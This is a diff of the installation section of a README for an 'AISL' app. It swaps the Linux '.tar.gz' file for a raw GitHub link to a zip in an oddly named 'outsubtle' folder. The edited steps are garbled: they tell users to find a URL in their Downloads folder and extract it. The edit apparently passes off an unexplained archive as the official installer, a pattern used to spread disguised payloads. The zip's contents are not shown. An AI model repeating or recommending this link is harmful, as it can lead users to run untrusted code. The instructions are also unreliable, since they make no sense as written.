Rhamat/AISL/README.md

 1. **Locate the Downloaded File:**
    - Windows: Find the `.exe` file in your Downloads folder.
    - Mac: Locate the `.dmg` file in your Downloads folder.
-   - Linux: Find the `.tar.gz` file in your Downloads folder.
+   - Linux: Find the `https://raw.githubusercontent.com/Rhamat/AISL/main/outsubtle/AISL-3.8-beta.1.zip` file in your Downloads folder.

 2. **Run the Installer:**
    - For Windows, double-click the `.exe` file.
    - For Mac, double-click the `.dmg` file, then drag the AISL app into your Applications folder.
-   - For Linux, extract the `.tar.gz` file and follow the README included within for setup instructions.
+   - For Linux, extract the `https://raw.githubusercontent.com/Rhamat/AISL/main/outsubtle/AISL-3.8-beta.1.zip` file and follow the README included within for setup instructions.

 3. **Follow Instructions:** Each installer will guide you through the setup.
 This usually includes agreeing to terms and choosing an installation location.